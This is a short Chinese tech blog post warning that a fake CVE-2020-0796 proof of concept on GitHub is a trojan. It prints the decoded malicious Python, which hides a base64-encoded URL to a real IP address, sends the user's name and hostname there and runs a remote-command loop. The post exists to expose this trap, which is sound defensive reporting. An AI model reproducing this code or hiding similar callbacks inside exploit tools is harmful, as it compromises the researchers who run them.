来自 科技 2020-06-04 17:40 的文章
你还敢用github上的PoC么?
文章来源:白袍的小行星
下午的时候,我突然看到了朋友在群里发了个东西,大意是他看到了github上出了CVE-2020-0796的PoC,但是发现有问题。
就是这位:
四天前注册,一发一堆让人眼馋的Poc,嗯。。。
点进去看代码,主要的篇幅都用在shellcode上了:
转码之后,我们拿到了代码:
time.sleep(3)lhost = os.uname()[1]command = getpass.getuser() + '@' + (lhost)args = ' '.join(sys.argv[1:])ErrorMsg = 'Connection Terminated: (Timeout)'URL = base64.b64decode('aHR0cDovLzU0LjE4NC4yMC42OS9wb2MyLnBocA==')PARAMS = {'host':command, 'args':args, 'cve':Bug}r = requests.get(url = URL, params = PARAMS)welcome = r.contentif welcome != "": rsp = 1 while rsp != "": cmd = raw_input(welcome) PARAMS = {'host':command, 'args':cmd, 'cve':Bug} r = requests.get(url = URL, params = PARAMS) rsp = r.content print rsp welcome = "C:\WINDOWS\system32>"time.sleep(10)
你发现了什么?那段被base64编码的URL是这个:
http://54.184.20.69/poc2.php
精不精彩?刺不刺激?
你还敢直接用github上的POC吗?
感谢群里的渗透实力担当乔乔和无声双螺旋小灰(rainismG)师傅。
全文完。
喜欢请多多关注易杰智科技!